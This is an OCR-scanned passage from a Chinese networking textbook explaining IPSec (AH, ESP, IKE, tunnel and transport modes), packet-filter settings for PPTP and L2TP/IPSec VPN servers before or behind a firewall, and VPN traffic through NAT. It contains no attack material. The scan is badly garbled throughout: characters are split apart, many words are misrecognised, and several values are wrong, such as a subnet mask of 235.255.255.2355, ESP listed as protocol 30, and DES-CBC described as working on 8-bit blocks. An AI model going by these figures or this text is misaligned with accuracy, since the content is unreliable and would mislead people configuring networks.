理 ， 而 不 必 设 计 和 实现 自己 的 安全 机 制 ， 因 此 可 以 减少 密 钥 协商 的 开销 ， 也 降低 了 生产 安 
全 漏洞 的 可 能 性 。IPSec 可 连续 或 递归 应 用 ， 在 路 由 器 、 防 火 墙 、 主 机 和 通信 链 路 上 配置 ， 
实现 端 到 端 安全 、 虚 拟 专 用 网 络 和 安全 隧道 技术 。 

IPSec 在 4 个 层次 上 起 作用 : 加 密 和 封装 、 验 证 和 重 放 容错 、 密 钥 管 理 以 及 数字 签名 和 
数字 证 书 。IPSec 加 密 是 端 对 端的 , 就 是 说 它 在 从 一 台 机 器 到 另 一 台 计算 机 途中 信息 仍然 是 
加 密 的 ， 并 且 只 能 由 另 一 端的 计算 机 解密 。IPSec 同样 使 用 公 钥 加 密 技术 , 不同 的 是 两 端 都 
生成 共享 密 钥 ， 而 且 共 享 密 钥 不 能 在 网 络 上 传输 。 

IPSec 提供 三 种 不 同 的 形式 来 保护 通过 公有 或 私有 IP 网 络 来 传送 的 私有 数 外 。 
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1. 认证 

作用 是 可 以 确定 所 接受 的 数据 与 所 发 送 的 数据 是 一 致 的 ， 同 时 可 以 确定 申请 发 送 者 在 
实际 上 是 真实 发 送 者 ， 而 不 是 伪装 的 。 

2. 数据 完整 

作用 是 保证 数据 从 原 发 地 到 目的 地 的 传送 过 程 中 没有 任何 不 可 检测 的 数据 丢失 与 

3. 机 密 性 


作用 是 使 相应 的 接收 者 能 获取 发 送 的 真正 内 容 ， 而 无 意 获取 数据 的 接收 者 无 法 获知 数 
据 的 真正 内 容 。 

在 IPSEC 由 三 个 基本 要 素来 提供 以 上 三 种 保护 形式 : 认证 协议 头 (AH)、 安 全 加 载 封装 
(ESP) 和 互联 网 密 匙 管理 协议 (KMP)。 认证 协议 关 和 安全 加 载 封装 可 以 通过 分 开 或 组 合 使 用 
来 达到 所 希望 的 保护 等 级 。 

认证 协议 头 (A 本 是 在 所 有 数据 包头 加 入 一 个 密码 。 正 如 整个 名 称 所 示 ，AH 通过 一 个 
只 有 密 匙 持 有 人 才 知 道 的 “数字 签名 ”来 对 用 户 进 行 认 证 。 这 个 签名 是 数据 包 通过 特别 的 
算法 得 出 的 独特 结果 ; AH 还 能 维持 数据 的 完整 性 ， 因 为 在 传输 过 程 中 无 论 多 小 的 变化 被 
加 载 ， 数 据 包头 的 数字 签名 都 能 把 它 检测 出 来 。 不 过 由 于 AH 不 能 加 密 数 据 包 所 加 载 的 内 
容 ， 因 而 它 不 保证 任何 的 机 密 性 。 两 个 最 普遍 的 AH 标准 是 MD5 和 SHA-1，MDS5 使 用 最 
高 到 128 位 的 密 钥 ， 而 SHA-1 通过 最 高 到 160 位 密 钥 供 更 强 的 保护 。 

安全 加 载 封 装 (ESP) 通 过 对 数据 包 的 全 部 数据 和 加 载 内 容 进行 全 加 密 来 严格 保证 传输 
信息 的 机 密 性 ， 这 样 可 以 避免 其 他 用 户 通 过 监听 来 打开 信息 交换 的 内 容 ， 因 为 只 有 受信 任 
的 用 户 拥有 密 钥 打开 内 容 。ESP 也 能 提供 认证 和 维持 数据 的 完整 性 。 最 主要 的 ESP 标准 是 
数据 加 密 标 准 (DES)，DES 最 高 支持 56 位 的 密 铀 ， 而 3DES 使 用 三 套 密 钥 加 密 ， 那 就 相当 
于 使 用 最 高 到 168 位 的 密 钥 。 由 于 ESP 实际 上 加 密 所 有 的 数据 ， 因 而 它 比 AH 需要 更 多 的 
处 理 时 间 ， 从 而 导致 性 能 下 降 。 

1. VPN 的 加 密 算法 说 明 


1) IPSec 认证 

IPSec 认证 包头 (AH) 是 一 个 用 于 提供 卫 数据 报 完整 性 和 认证 的 机 制 。 完 整 性 保证 数据 
报 不 被 无 意 的 或 恶意 的 方式 改变 ， 而 认证 则 验证 数据 的 来 源 (主机 、 用 户 、 网 络 等 )。AH 本 
身 其 实 并 不 支持 任何 形式 的 加 密 ， 它 不 能 保护 通过 Intemet 发 送 的 数据 的 可 信 性 。AH 只 是 
在 加 密 的 出 口 、 进 口 或 使 用 受到 当地 政府 限制 的 情况 下 可 以 提高 全 球 Intenret 的 安全 性 。 当 
全 部 功能 实现 后 ， 它 将 通过 认证 IP 包 并 且 减 少 基于 IP 欺骗 的 攻击 几率 来 提供 更 好 的 安全 
服务 。AH 使 用 的 包头 放 在 标准 的 IPv4 和 Ipv6 包头 和 下 一 个 高 层 协议 帧 (如 TCP、UDP、I 
CMP 等 ) 之 间 。 

AH 协议 通过 在 整个 卫 数据 报 中 实施 一 个 消息 文摘 计算 来 提供 完整 性 和 认证 服务 。 一 
个 消息 文摘 就 是 一 个 特定 的 单 向 数据 函数 ， 它 能 够 创建 数据 报 的 唯一 的 数字 指纹 。 消 息 文 
摘 算法 的 输出 结果 放 到 AH 包头 的 认证 数据 (Authentication_Data) 区 .消息 文摘 5 算法 (MD5) 


是 一 个 单 向 数学 函数 。 当 应 用 到 分 组 数据 中 时 ， 它 将 整个 数据 分 割 成 若干 个 128 比特 的 信 
息 分 组 。 每 个 128 比特 为 一 组 的 信息 是 大 分 组 数据 的 压缩 或 摘要 的 表示 。 当 以 这 种 方式 使 
用 时 ，MDS5 只 提供 数字 的 完整 性 服务 。 一 个 消息 文摘 在 被 发 送 之 前 和 数据 被 接收 到 以 后 都 
可 以 根据 一 组 数据 计算 出 来 。 如 果 两 次 计算 出 来 的 文摘 值 是 一 样 的 ， 那 么 分 组 数据 在 传输 
过 程 中 就 没有 被 改变 。 这样 就 防止 了 无 意 或 恶意 的 算 改 。 在 使 用 HMAC 一 MDS5 认证 过 的 数 
据 交 换 中 ， 发 送 者 使 用 以 前 交换 过 的 密 钥 来 首次 计算 数据 报 的 64 比特 分 组 的 MD5 文摘 。 
从 一 系列 的 16 比特 中 计算 出 来 的 文摘 值 被 累加 成 一 个 值 ,然后 放 到 AH 包头 的 认证 数据 区 ， 
随后 数据 报 被 发 送 给 接收 者 。 接 收 者 也 必须 知道 密 钥 值 ， 以 便 计 算出 正确 的 消息 文摘 并 且 
将 其 与 接收 到 的 认证 消息 文摘 进行 适 配 。 如 果 计 算出 的 和 接收 到 的 文摘 值 相等 ， 那 么 数据 
报 在 发 送 过 程 中 就 没有 被 改变 ， 而 且 可 以 相信 是 由 只 知道 秘密 密 钥 的 另 一 方 发 送 的 。 

2) ”IPSec 加 密 

封包 安全 协议 (ESP) 包 头 提供 卫 数据 报 的 完整 性 和 可 信 性 服务 ，ESP 协议 是 设计 以 两 
种 模式 工作 的 ， 隧 道 (Tunneling) 模 式 和 传输 (Transport) 模 式 。 两 者 的 区 别 在 于 卫 数据 报 的 
ESP 负载 部 分 的 内 容 不 同 。 在 隧道 模式 中 , 整个 卫 数据 报 都 在 ESP 负载 中 进行 封装 和 加 密 。 
当 这 完成 以 后 ， 真 正 的 人 P 源 地 址 和 目的 地 址 都 可 以 被 隐藏 为 Intemet 发 送 的 普通 数据 。 这 
种 模式 的 一 种 典型 用 法 就 是 在 防火 墙 一 防火 墙 之 间 通 过 虚拟 专用 网 的 连接 时 进行 的 主机 或 
拓扑 隐藏 。 在 传输 模式 中 ， 只 有 更 高 层 协 议 帧 (TCP、UDP、ICMP 等 ) 被 放 到 加 密 后 的 卫 
数据 报 的 ESP 负载 部 分 。 在 这 种 模式 中 ， 源 和 目的 他 地 址 以 及 所 有 的 他 包头 域 都 是 不 加 

IPSec 要 求 在 所 有 的 ESP 实现 中 使 用 一 个 通用 的 默认 算法 ， 即 DES 一 CBC 算法 。 美 国 
数据 加 密 标准 (DES) 是 一 个 现在 使 用 得 非常 普遍 的 加 密 算法 。 它 最 早 是 在 由 美国 政府 公布 
的 ， 最 初 是 用 于 商业 应 用 。 到 现在 所 有 DES 专利 的 保护 期 都 已 经 到 期 了 ， 因 此 全 球 都 有 它 
的 免费 实现 。IPSec ESP 标准 要 求 所 有 的 ESP 实现 支持 密码 分 组 链 方式 (CBC) 的 DES 作为 
默认 的 算法 。DES 一 CBC 通过 对 组 成 一 个 完整 的 下 数据 包 (隧道 模式 ) 或 下 一 个 更 高 的 层 协 
议 帧 (传输 模式 ) 的 8 比特 数据 分 组 中 加 入 一 个 数据 函数 来 工作 。DES 一 CBC 用 8 比特 一 组 
的 加 密 数 据 ( 密 文 ) 来 代替 8 比特 一 组 的 未 加 密 数据 (明文 )。 一 个 随机 的 、8 比特 的 初始 化 向 
量 (IV) 被 用 来 加 密 第 一 个 明文 分 组 ， 以 保证 即使 在 明文 信息 开头 相同 时 也 能 保证 加 密 信 息 
的 随机 性 。DES 一 CBC 主要 是 使 用 一 个 由 通信 各 方 共享 的 相同 的 密 钥 。 正 因为 如 此 ， 它 被 
认为 是 一 个 对 称 的 密码 算法 。 接 收 方 只 有 使 用 由 发 送 者 用 来 加 密 数 据 的 密 钥 才 能 对 加 密 数 
据 进行 解密 。 因 此 ，DES 一 CBC 算法 的 有 效 性 依赖 于 秘密 密 钥 的 安全 ，ESP 使 用 的 DES 一 
CBC 的 密 钥 长 度 是 56 比特 。 

IPSec 有 两 种 工作 方式 : 隧道 模式 和 传输 模式 。 在 隧道 方式 中 ， 整 个 用 户 的 人 P 数据 包 
被 用 来 计算 ESP 包头 ， 整 个 耳 包 被 加 密 并 和 ESP 包头 一 起 被 封装 在 一 个 新 的 了 P 包 内 。 这 
样 当 数 据 在 Intemet 上 传送 时 , 真正 的 源 地 址 和 目的 地 址 被 隐藏 起 来 。 在 传输 模式 中 ,只 有 
高 层 协议 (TCP、UDP、ICMP 等 ) 及 数据 进行 加 密 。 在 这 种 模式 下 ， 源 地 址 、 目 的 地 址 以 及 
所 有 下 包头 的 内 容 都 不 加 密 。 

2. IPSec 的 工作 方式 


(1) 计算 机 A 通过 一 个 不 可 靠 IP 网 络 发 送 数据 给 计算 机 B。 在 开始 传输 之 前 , 计算 机 
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A 上 的 算法 查看 是 否 应 该 依照 建立 在 A 上 的 安全 策略 保护 数据 。 安 全 策略 包含 一 些 规则 ， 
可 以 确定 通信 的 敏感 程度 。 

(2) 如 果 过 滤器 发 现 有 匹配 的 结果 ,人 A 首先 与 B 通 过 称 为 Intemet 密 钥 交 换 (Intermet Key 
Exchange，IKE) 的 协议 开始 进行 安全 协商 。 然 后 两 台 计 算 机 依照 在 安全 规则 中 指定 的 验证 
方法 交换 和 凭据。 验证 方法 可 以 是 Kerberos、 公 钥 凭 据 或 者 是 预先 确定 的 密 钥 值 。 

(3) 一 旦 协商 开始 ， 在 两 台 计 算 机 之 间 会 建立 两 种 协商 协议 ， 称 为 安全 关联 (security 
association)。 第 一 种 叫做 Phase TIKE SA， 它 指定 了 两 台 计算 机 将 如 何 彼此 信任 。 第 二 种 是 
关于 两 台 计 算 机 如 何 保护 应 用 程序 通信 的 协议 ， 叫 做 Phase IIPSec Sec Sas,， 它 指定 了 安全 
方法 和 各 方向 通信 的 密 钥 。IKE 为 每 个 SA 自动 创建 并 刷新 共享 秘密 密 钥 。 秘 密 密 钥 分 别 
在 网 络 两 端 创建 ， 不 会 在 网 络 中 传输 。 

(4) 为 了 保证 信息 的 完整 性 ， 计 算 机 A 对 发 出 的 数据 包 签 名 ， 并 且 依照 双方 协商 好 的 
方法 加 密 或 不 加 密 数 据 包 。 然 后 将 数据 包 传送 到 B。 

(5) 计算 机 B 查看 数据 包 的 完整 性 , 如 有 需要 则 将 其 解密 。 然 后 数据 沿 着 卫 堆栈 向 上 
传送 到 通常 的 应 用 程序 中 。 

3. IPSec 有 以 下 三 个 特点 


(1) 原来 的 局 域 网 机 构 彻 底 透 明 。 透 明 表 现 为 三 方面 : 系统 不 占用 原 网 络 系统 中 任何 
卫 地 址 : 装 入 VPN 系统 后 ， 原 来 的 网 络 系统 不 需要 改变 任何 配置 ; 原 有 的 网 络 不 知道 自己 
与 外 界 的 信息 传递 已 受到 了 加 密 保护 ， 该 特点 不 仅 能 够 为 安装 调试 提供 方便 ， 也 能 够 保护 
系统 自身 不 受 外 来 网 络 的 攻击 。 

(2) IPSec 内 部 实现 与 耳 实现 融 为 一 体 、 优 化 设计 ， 具 有 很 高 的 运行 效率 。 

(3) 安装 VPN 的 平台 通常 采用 安全 操作 系统 内 核 并 以 嵌入 的 方式 固化 ， 具 有 无 漏洞 、 
抗 病毒 、 抗 攻击 等 安全 防范 性 能 。 

作为 网 络 层 的 安全 标准 ，IPSec 一 经 提出 ， 就 引起 了 计算 机 网 络 界 的 关注 ， 很 多 计算 机 
网 络 公司 的 产品 都 宣布 支持 这 个 标准 ， 并 且 不 断 推出 新 的 产品 。 但 由 于 标准 提出 时 间 短 ， 
因此 尽管 产品 种 类 很 多 ， 真 正 合格 的 产品 却 很 少 。 


6.3.4 ”VPN 综合 应 用 


1. VPN 与 Windows 防火 墙 


防火 墙 可 以 用 来 进行 报 文 过 滤 ， 以 便 允 许 或 者 拒绝 那些 非常 特殊 的 网 络 流量 流通 。IP 
报 文 过滤 功 能 能 够 为 用 户 提供 一 种 方法 ， 用 来 精确 地 定义 什么 类 型 的 下 流量 允许 通过 防 
火 墙 。 

可 以 有 两 种 方法 在 VPN 服务 器 上 使 用 防火 墙 。 

(1) VPN 服务 器 在 Intemet 上 ， 而 防火 墙 位 于 VPN 服务 器 与 内 部 网 之 间 。 

(2) 防火 墙 在 Intemet 上 ，VPN 服务 器 位 于 防火 墙 与 内 部 网 之 间 。 

1) ”VPN 服务 器 位 于 防火 墙 之 前 

VPN 服务 器 位 于 防火 墙 之 前 连接 到 Intemet 上 , 用 户 就 必须 在 Intemet 接口 上 添加 一 个 
报 过 滤器 ， 只 允许 那些 到 达 或 者 来 自 Intemet VPN 服务 器 接口 IP 地 址 的 VPN 流量 流动 。 


对 于 输入 流量 , 隧道 数据 被 VPN 服务 器 解密 之 后 将 被 转发 给 防火 墙 ， 防 火 墙 再 利用 过 
滤器 允许 流量 转发 给 内 部 网 中 的 资源 。 由 于 在 VPN 服务 器 上 通过 的 流量 仅仅 是 被 已 验证 
VPN 客户 所 产生 的 流量 ， 所 以 在 这 个 过 程 中 执行 的 防火 墙 过 滤 功 能 ， 可 以 用 来 防止 VPN 
户 访问 某 些 特定 的 内 部 网 资源 。 

因为 允许 在 内 部 网 中 通过 因特网 流量 必须 经 过 VPN 服务 器 , 因此 这 个 过 程 也 会 阻止 非 
VPN Intemet 用 户 对 FTP( 文 件 传输 协议 ) 或 者 Web 内 部 网 资源 的 共享 。 

对 于 VPN 服务 器 上 的 Intermet 接口 ， 用 户 可 以 使 用 Routing and Remote Access 插件 配 
置 下 列 的 输入 过 滤器 与 输出 过 滤器 。 

(1) PPTP 报 文 过 滤器 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输入 过 滤器 : 

GD 目标 卫 地 址 是 VPN 服务 器 Intemet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255，TCP 
目标 端口 为 1723(0x06BB)。 这 个 过 滤器 允许 进行 从 PPTP 客户 到 PPTP 服务 器 的 PPTP 隧道 
维护 流量 的 流通 。 

@ 目标 卫 地 址 是 VPN 服务 器 Intemet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255，IP 
协议 ID 为 47(0x2F)。 这 个 过 滤器 允许 从 PPTP 客户 到 达 PPTP 服务 器 的 OPPTP 隧道 数据 流通 。 

@ 目标 人 P 地 址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 掩 码 为 235.255.255.2355，TCP 
目标 端口 为 1723(0x06BB)。 这 个 过 滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 
中 的 VPN 客户 (呼叫 方 路 由 器 ) 时 才 必 需 。 如 果 用 户 选 择 了 TCP[established]， 那 么 只 有 当 
VPN 服务 器 初始 化 了 TCP 连接 时 才 接 收 流量 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输出 过 滤器 。 

GD 源 了 人 P 地址 是 VPN 服务 器 Intemet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255，TCP 
源 端 口 为 1723(0x06BB)。 这 个 过 滤器 允许 进行 从 PPTP 服务 器 到 PPTP 客户 的 PPTP 隧道 维 
护 流量 的 流通 。 

@ 源 卫 地址 是 VPN 服务 器 Intemet 接口 地 址 , 子 网 掩 码 为 255.255.255.255, IP 协议 
ID 为 47(0x2F)。 这 个 过 滤器 允许 从 PPTP 服务 器 到 达 PPTP 客户 的 PPTP 隧道 数据 流通 。 

@ 源 了 全 地址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 扼 码 为 255.255.255.255，TCP 
源 端口 为 1723(0x06BB)。 这 个 过 滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 中 
的 VPN 客户 (呼叫 方 路 由 器 ) 时 才 必 需 。 如 果 用 户 选择 了 TCP[established], 那么 只 有 当 VPN 
服务 器 初始 化 了 TCP 连接 时 才 接 收 流量 。 

(2) IPSecL2TP 报 文 过 滤器 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输入 过 滤器 。 

@ 目标 卫 地 址 是 VPN 服务 器 Intemet 接口 地 址 , 子 网 掩 码 是 255.255.255.255, UDP 
目标 端口 为 500(0x01F4)。 这 个 过 滤器 允许 到 达 VPN 服务 器 的 IKE(Intemet Key Exchange， 
网 际 密 钥 交换 ) 流 量 流通 。 

@ 目标 卫 地 址 是 VPN 服务 器 Intemet 接口 地 址 , 子 网 掩 码 是 255.255.255.255, UDP 
目标 端口 为 1701(0x6A5)。 这 个 过 滤器 允许 从 VPN 客户 到 VPN 服务 器 的 L2TP 隧道 数据 
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用 户 可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 被 设置 为 Drop all packets except those 
that meet the criteria below 的 输出 过 滤器 。 

@ 源 卫 地址 是 VPN 服务 器 Intemet 接口 地 址 ， 子 网 掩 码 是 255.255.255.255，UDP 
源 端口 为 500(0x01F4)。 这 个 过 滤器 允许 来 自 VPN 服务 器 的 IKE 流量 流通 。 
@ 源 了 他 地址 是 VPN 服务 器 Intemet 接口 地 址 ， 子 网 掩 码 是 255.255.255.255，UDP 
源 端 口 为 1701(0x6A5)。 这 个 过 滤器 允许 从 VPN 服务 器 到 VPN 客户 的 L2TP 隧道 数据 流通 。 
对 于 了 PP 协议 50 的 IPsec ESP 流量 ， 不 需要 有 任何 过 滤器 。 在 IPSec 模块 的 TCP/IP 删 
除了 ESP 头 之 后 ，Routing and Remote Access 服务 过 滤器 就 自动 发 生 作用 。 

2) ”VPN 服务 器 位 于 防火 墙 之 后 

在 更 为 常见 的 配置 方式 中 ， 防 火 墙 是 直接 连接 到 Intemet 上 ， 而 VPN 服务 器 则 是 连接 
到 DMZ(Demilitarized Zone， 非 敏感 区 ) 的 另 一 个 内 部 网 资源 。DMZ 是 一 个 卫 网 关 , 通常 
包含 有 Intermet 用 户 可 以 访问 的 网 络 资源 (如 Web 服务 器 与 FTP 服务 器 )。VPN 服务 器 在 
DMZ 上 有 一 个 接口 ， 而 且 在 内 部 网 上 也 有 一 个 接口 。 

在 这 种 方式 中 , 防火 墙 必须 在 它 的 Intemet 接口 上 配置 有 输入 过 滤器 和 输出 过 滤器 , 用 
来 允许 到 达 VPN 服务 器 的 隧道 维护 流量 与 隧道 数据 通过 。 其 他 的 过 滤器 可 以 用 来 允许 到 
达 Web 服务 器 、FTP 服务 器 以 及 DMZ 上 其 他 类 型 服务 流量 的 流通 。 

因为 防火 墙 没 有 为 每 一 个 VPN 连接 提供 单独 的 密 钥 , 它 只 能 对 隧道 数据 的 明文 头 部 进 
行 过 滤 ， 也 就 是 说 所 有 的 隧道 数据 都 是 可 以 通过 防火 墙 。 但 是 ， 这 并 不 是 一 种 安全 的 通信 
方法 ， 因 此 VPN 连接 需要 有 一 个 验证 过 程 用 来 阻止 对 VPN 服务 器 的 未 授权 访问 。 

对 于 防火 墙 上 的 Intemet 接口 ,必须 使 用 防火 墙 配 置 软件 对 下 列 输入 过 滤器 或 者 输出 过 
滤器 进行 配置 。 

(1) PPTP 报 文 过 滤器 。 

可 以 按照 以 下 方法 , 配置 一 个 过 滤器 动作 , 将 其 设置 为 Drop all packets except those that 
meet the criteria below 的 输入 过 滤器 。 

@ 目标 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 目标 端口 为 1723(0x06BB)。 这 
个 过 滤器 允许 进行 从 PPTP 客户 到 PPTP 服务 器 的 PPTP 隧道 维护 流量 的 流通 。 

@ 目标 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，IP 协议 了 D 为 47(0x2F)。 这 个 过 滤器 
允许 从 PPTP 客户 到 达 PPTP 服务 器 的 OPPTP 隧道 数据 流通 。 

@ 目标 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 目标 端口 为 1723(0x06BB)。 这 
个 过 滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 中 的 VPN 客户 (呼叫 方 路 由 器 ) 
时 才 必 需 。 如 果 用 户 选择 了 TCP[established]， 那 么 只 有 当 VPN 服务 器 初始 化 了 TCP 连接 
时 才 接 受 流量 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输出 过 滤器 。 

中 源 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 目标 端口 为 1723(0x06BB)。 这 个 
过 滤器 允许 进行 从 VPN 服务 器 到 VPN 客户 的 PPTP 隧道 维护 流量 的 流通 。 
@ 源 卫 地址 是 VPN 服务 器 DMZ 接口 地 址 ， 卫 协议 ID 为 47(0x2F)。 这 个 过 滤器 允 
午 从 VPN 服务 器 到 达 VPN 客户 的 PPTP 隧道 数据 流通 。 
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@ 源 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 源 端口 为 1723(0x06BB)。 这 个 过 
滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 中 的 VPN 客户 (呼叫 方 路 由 器 ) 时 才 
必需 。 如 果 用 户 选择 了 TCP[establishedlj]， 那 么 只 有 当 VPN 服务 器 初始 化 了 TCP 连接 时 才 

(2) IPSec L2TP 报 文 过 滤器 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输入 过 滤器 。 

@ 目标 他 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，UDP 目标 端口 为 500(0x01F4)。 这 个 
过 滤器 允许 到 达 VPN 服务 器 的 下 E( 网 际 密 钥 交换 ) 流 量 流通 。 

@ 目标 全 地 址 是 VPN 服务 器 DMZ 接口 地 址 ， 卫 协议 ID 为 30(0x32)。 这 个 过 滤器 
允许 从 VPN 客户 到 VPN 服务 器 的 IPSecESP 隧道 数据 流通 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 被 设置 为 Drop all packets except those that 
meet the criteria below 的 输出 过 滤器 。 

中 源 耳 地址 是 VPN 服务 器 DMZ 接口 地 址 ， 王 协议 ID 为 500(0x01F4)。 这 个 过 波 
器 允许 来 自 VPN 服务 器 的 IKE 的 流量 流通 。 

@ 源 卫 地址 是 VPN 服务 器 DMZ 接口 地 址 ，IP 协议 ID 为 50(0x32)。 这 个 过 滤器 允 
许 从 VPN 服务 器 到 VPN 客户 的 IPSec ESP 隧道 数据 流通 。 

在 UDP 端口 1701 上 不 需要 为 L2TP 流量 提供 过 滤器 ,在 防火 墙 上 , 所 有 L2TP 流量 ( 包 
括 隧道 维护 信息 与 隧道 数据 ) 都 是 作为 IPSec ESP 有 效 载荷 进行 加 密 处 理 的 。 

2. VPN 与 网 络 地 址 翻译 器 


NAT(Network Address Transfer， 网 络 地 址 翻译 器 ) 是 一 种 具有 对 报 文 的 P 地 址 与 
TCP/UDP 端口 号 进行 翻译 能 力 的 IP 路 由 器 。 现 在 假设 有 一 个 公司 希望 将 多 台电 脑 连接 到 
互联 网 上 。 

一 般 情况 下 ， 网 关 必 须 为 每 台电 脑 在 网 络 上 获取 一 个 公共 地 址 。 但 是 利用 NAT， 那 么 
它 就 可 以 不 需要 有 多 个 公共 地 址 。 它 可 以 在 小 型 商务 网 上 使 用 专用 地 址 , 然后 利用 NAT 将 
专用 地 址 映射 到 ISP 所 分 配 的 一 个 或 者 多 个 全 地 址 上 。 

例如 ， 某 公司 在 它 的 专用 网 内 部 使 用 网 络 地 址 10.0.0.0/8， 并 且 某 个 ISP 为 它 分 配 了 一 
个 公共 卫 地 址 ab.c.d， 那 么 NAT 就 可 以 静态 或 者 动态 地 将 所 有 专用 网 络 10.0.0.0/8 的 他 
地 址 映射 到 下 地 址 a.b.c.d 上 。 

对 于 输出 报 文 ， 源 人 P 地 址 与 TCP/IP 端口 号 被 映射 到 a.b.c.d， 以 及 一 个 可 能 改变 了 的 
TCP/UDP 端口 号 上 。 对 于 输入 报 文 ， 目 标 卫 地 址 与 TCP/UDP 端口 号 被 映射 到 专用 全 地 
址 以 及 一 个 原始 TCP/UDP 端口 号 上 。 

默认 情况 下 ，NAT 将 对 卫 地 址 与 TCP/UDP 端口 号 进行 翻译 。 如 果 卫 地 址 与 端 信息 
仅仅 在 于 头 与 TCP/UDP 头 总 , 那么 这 个 应 用 协议 将 会 被 透明 地 翻译 。 例 如 , 在 万 维 网 www 
上 对 超 文本 传输 协议 HTTP 流量 进行 翻译 。 

但 是 ， 有 些 应 用 协议 在 它们 的 头 中 存储 下 地 址 或 者 TCP/UDP 端口 信息 。 例 如 ，FTP 
就 是 在 FTP 头 中 存储 卫 地 址 。 如 果 NAT 不 能 正确 地 翻译 FTP 头 中 的 他 地 址 ， 那 么 就 有 
可 能 导致 连接 错误 。 此 外 ， 有 些 协议 并 不 使 用 TCP 头 或 者 UDP 头 ， 而 是 在 其 他 的 头 中 使 
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用 某 些 域 来 标识 数据 流 。 

如 果 NAT 组 件 必须 翻译 或 者 调整 全 头 、TCP 头 或 UDP 头 中 的 有 效 载荷 那么 就 必须 
使 用 NAT 编辑 器 。NAT 编辑 器 可 以 正确 地 修改 那些 不 可 翻译 的 有 效 载荷 ， 以 便 使 它们 能 
够 在 NAT 上 顺利 通过 。 

VPN 流量 的 地 址 映射 与 端口 映射 为 了 能 够 保证 PPTP 隧道 与 IPSec L2TP 隧道 在 NAT 
上 正确 地 工作 ，NAT 必须 能 够 将 多 个 数据 流 映射 到 单独 的 瑟 地 址 上 ， 也 要 从 单独 的 卫 地 
址 映射 到 多 个 数据 流 。 

1) PPTP 流量 

PPTP 流量 中 包括 进行 隧道 维护 的 TCP 连接 以 及 隧道 数据 GRE 封装 结果 。 TCP 连接 方 
式 可 以 被 NAT 翻译 ， 这 是 因为 源 TCP 端口 号 可 以 被 透明 地 翻译 。 但 是 ，GRE 的 封装 数据 
在 没有 NAT 编辑 器 支持 的 情况 下 不 能 被 NAT 翻译 。 对 隧道 数据 ,隧道 可 以 由 源 他 地址 与 
GRE 头 中 的 Call ID 域 进行 标识 。 如 果 在 NAT 隧道 的 专用 网 络 端 存在 多 个 PPTP 客户 都 要 
与 相同 的 PPTP 服务 器 建立 隧道 , 那么 这 些 所 有 的 隧道 流量 就 具有 相同 的 源 瑟 地 址 。 同 时 ， 
由 于 PPTP 客户 并 不 知道 它们 已 经 被 翻译 , 所 以 就 有 可 能 在 建立 PPTP 隧道 的 过 程 中 使 用 相 
同 的 Call ID。 这 就 有 可 能 出 现 这 样 的 情况 : 来 自 NAT 专用 网 络 端 多 个 PPTP 客户 的 隧道 数 
据 ， 在 翻译 时 具有 相同 的 源 下 地 址 与 相同 的 Call ID 。 

为 防止 这 种 情况 ，PPTP 的 NAT 编辑 器 必须 监视 PPTP 隧道 的 创建 过 程 ， 并 且 在 专用 
JP 地 址 与 Call ID 之 间 建 立 单独 的 映射 关系 ， 就 像 PPTP 客户 将 公共 IP 地 址 与 在 Intemet 
PPTP 服务 器 上 所 接收 到 的 单独 Call ID 进行 映射 一 样 。 

2) IPSecL2TP 流量 

IPSec L2TP 流量 不 可 被 NAT 所 翻译 ， 这 就 是 因为 UDP 端口 号 被 加 密 了 ， 并 且 它 的 值 
受 校 验 和 的 保护 。 由 于 以 下 原因 ， 即 使 是 带 有 编辑 器 的 NAT 也 不 能 对 IPSec L2TP 流量 进 
行 翻译 。 

(1) 不 能 区 分 多 个 IPSec L2TP 数据 流 。 

ESP 头 中 包含 有 一 个 名 为 SPI( 安 全 参数 索引 ) 的 域 。SPI 可 以 用 来 将 明文 形式 耳 头 中 的 
目标 卫 地 址 与 IPSec 安全 协议 连接 起 来 ， 用 来 标识 IPSec SA(Security Association， 安全 
协会 )。 

对 于 来 自 NAT 的 输出 流量 ， 它 的 目标 卫 地 址 并 不 改变 。 对 于 到 达 NAT 的 流量 ， 目 标 
JP 地 址 必须 被 映射 到 专用 于 地 址 。 正 如 在 NAT 专用 网 络 端 可 能 会 存在 多 个 PPTP 客户 的 
情况 一 样 , 多 个 IPSec L2TP 数据 流 输入 流量 的 目标 瑟 地 址 与 SPI 上。 但是, 由 于 ESP Auth 
跟踪 器 中 包含 有 用 来 验证 ESP 头 以 及 它 的 有 效 载荷 的 校 验 和 信息 ， 因 此 SPI 在 没有 校 验 和 
验证 的 情况 下 就 不 能 发 生 改 变 。 

(2) 不 能 改变 TCP 校 验 和 UDP 校 验 和 。 

在 IPSec L2TP 报 文中 ，UDP 头 和 TCP 头 中 包含 关于 源 地 址 IP 与 目标 地 址 人 P 地 址 的 
明文 形式 耳 头 在 内 的 校 验 和 。 在 没有 经 过 对 TCP 头 与 UDP 头 进行 校 验 和 验证 的 情况 下 ， 
